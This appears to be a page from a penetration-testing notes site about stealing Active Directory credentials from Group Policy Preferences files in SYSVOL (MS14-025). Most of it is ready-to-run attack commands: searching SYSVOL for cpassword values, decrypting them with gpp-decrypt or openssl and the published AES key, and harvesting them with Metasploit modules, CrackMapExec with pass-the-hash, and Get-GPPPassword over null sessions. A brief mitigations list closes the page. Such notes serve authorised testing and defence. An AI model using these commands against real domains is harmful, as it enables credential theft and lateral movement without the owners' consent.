SYSVOL and GPP

SYSVOL and GPP MS14-025

Search for the .xml file

use scanner/smb/smb_enum_gpp (Metasploit)
findstr /S /I cpassword \FQDN\sysvol\FQDN\policies*.xml

DNS Configuration

$dnsip= "DC_IP"

$index = Get-NetAdapter -Name 'ETHERNET' | Select-Object -ExpandProperty 'ifIndex' Set-DnsClientServerAddress -InterfaceIndex $index -serverAddresses $dnsip

nslookup DOMAIN

dir \\\\DOMAIN\SYSVOL\

Passwords in SYSVOL & Group Policy Preferences (GPP)

Group Policy Preferences (GPP) allowed admins to create policies using embedded credentials

These credentials were encrypted and placed in a "cPassword"

They key was accidentally released

Patched in MS14-025, but it doesn't prevent previous uses

GPP is an .xml file stored in SYSVOL directory

1) findstr /S /I cpassword \\sysvol<FQDN>\policies*.xml (Search for .xml file)

2) gpp-decrypt CPASSWORD

Alternate Method

Decrypt a Group Policy Password found in SYSVOL (by 0x00C651E0), using the 32-byte AES key provided by Microsoft in the MSDN - 2.2.1.1.4 Password Encryption

1) echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

Automate the SYSCOL and passwords search

1) Metasploit modules to enumerate shares and credentials

scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp

2) CrackMapExec

cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password

3) Get-GPPPassword

with a NULL session

Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'

with cleartext credentials

Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

pass-the-hash

Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_

MITIGATIONS

Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
Delete existing GPP xml files in SYSVOL containing passwords.
Don’t put passwords in files that are accessible by all authenticated users.

PreviousEternal Blue MS17-010 NextMSSQL

Last updated 8 months ago

hashtagSYSVOL and GPP MS14-025

hashtagSearch for the .xml file

hashtagDNS Configuration

hashtagPasswords in SYSVOL & Group Policy Preferences (GPP)

hashtagFind password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: \DOMAIN\SYSVOL\DOMAIN\Policies\ .

hashtagGroup Policy Preferences (GPP) allowed admins to create policies using embedded credentials

hashtagThese credentials were encrypted and placed in a "cPassword"

hashtagThey key was accidentally released

hashtagPatched in MS14-025, but it doesn't prevent previous uses

hashtagGPP is an .xml file stored in SYSVOL directory

hashtagAlternate Method

hashtagDecrypt a Group Policy Password found in SYSVOL (by 0x00C651E0), using the 32-byte AES key provided by Microsoft in the MSDN - 2.2.1.1.4 Password Encryption

hashtagAutomate the SYSCOL and passwords search

hashtag1) Metasploit modules to enumerate shares and credentials

hashtag2) CrackMapExec

hashtag3) Get-GPPPassword

hashtagwith a NULL session

hashtagwith cleartext credentials

hashtagpass-the-hash

hashtagMITIGATIONS